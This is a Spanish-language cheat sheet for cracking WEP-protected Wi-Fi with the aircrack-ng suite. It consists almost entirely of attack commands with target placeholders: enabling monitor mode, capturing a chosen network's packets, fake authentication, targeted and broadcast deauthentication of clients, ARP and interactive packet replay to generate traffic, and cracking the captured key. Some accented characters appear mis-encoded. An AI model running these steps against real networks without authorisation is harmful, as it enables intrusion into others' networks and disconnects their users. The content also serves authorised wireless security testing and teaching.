WEP

WEP, Wired Equivalent Privacy (WEP).

Habilitar modo monitor en tarjeta inal谩mbrica.

sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info

Captura de paquetes para identificar BSSID, ESSID y canal objetivo.

sudo airodump-ng <interface-mon>

Captura de paquetes de BSSID, ESSID y canal espec铆fico.

sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcap

Obtener direcci贸n MAC de tarjeta inal谩mbrica en modo monitor.

macchanger --show <interface-mon>

Autenticaci贸n falsa.

sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>

Desautenticaci贸n de cliente(s).

# Desautenticaci贸n dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>

# Desautenticaci贸n broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>

ARP request replay.

# Autenticaci贸n falsa
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>

# ARP request replay
sudo aireplay-ng -3 -b <BSSID> -h <interface-mon-mac-address> <interface-mon>

# Desautenticaci贸n de cliente
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>

Interactive packet replay.

# Autenticaci贸n falsa
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>

# Interactive packet replay
sudo aireplay-ng -2 -b <BSSID> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <interface-mon>

Cracking con Aircrack-ng.

aircrack-ng <file-name>.cap

脷ltima actualizaci贸n